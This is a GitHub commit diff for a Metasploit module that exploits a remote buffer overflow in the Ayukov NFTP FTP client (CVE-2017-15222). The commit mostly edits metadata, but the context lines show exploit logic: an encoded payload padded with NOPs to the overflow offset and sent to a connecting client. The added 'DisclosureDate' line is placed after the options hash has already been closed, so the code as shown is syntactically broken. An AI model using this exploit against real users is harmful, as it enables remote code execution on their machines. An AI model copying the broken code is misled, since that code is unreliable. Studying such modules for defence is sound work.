Skip to content

Commit 10b2833

Browse files
Update ayukov_nftp.rb
1 parent 21717ae commit 10b2833

File tree

1 file changed

+5
-4
lines changed

1 file changed

+5
-4
lines changed

modules/exploits/windows/ftp/ayukov_nftp.rb

Lines changed: 5 additions & 4 deletions
Original file line numberDiff line numberDiff line change
@@ -10,19 +10,19 @@ class MetasploitModule < Msf::Exploit::Remote
1010

1111
def initialize(info = {})
1212
super(update_info(info,
13-
'Name' => 'Ayukov NFTP FTP Client < 2.0 Remote Buffer Overflow',
13+
'Name' => 'Ayukov NFTP FTP Client Remote Buffer Overflow',
1414
'Description' => %q{
1515
This module exploits a buffer overflow in the Ayukov NFTPD FTP client 2.0 and earlier allowing remote code execution.
1616
},
1717
'Author' =>
1818
[
19-
'Berk Cem Göksel', # Original exploit author
19+
'Berk Cem Goksel', # Original exploit author
2020
'Daniel Teixeira' # MSF module author
2121
],
2222
'License' => MSF_LICENSE,
2323
'References' =>
2424
[
25-
[ 'CVE', 'CVE-2017-15222'],
25+
[ 'CVE', '2017-15222'],
2626
[ 'EDB', '43025' ],
2727
],
2828
'Payload' =>
@@ -40,6 +40,7 @@ def initialize(info = {})
4040
'SRVHOST' => '0.0.0.0',
4141
},
4242
'DefaultTarget' => 0))
43+
'DisclosureDate' => 'Oct 21 2017'))
4344

4445
register_options(
4546
[
@@ -67,7 +68,7 @@ def on_client_connect(client)
6768
sploit << payload.encoded
6869
sploit << make_nops(15000 - 4116 - 4 - 16 - payload.encoded.length)
6970
sploit << "\r\n"
70-
71+
7172
client.put(sploit)
7273

7374
client.get_once

0 commit comments

Comments
 (0)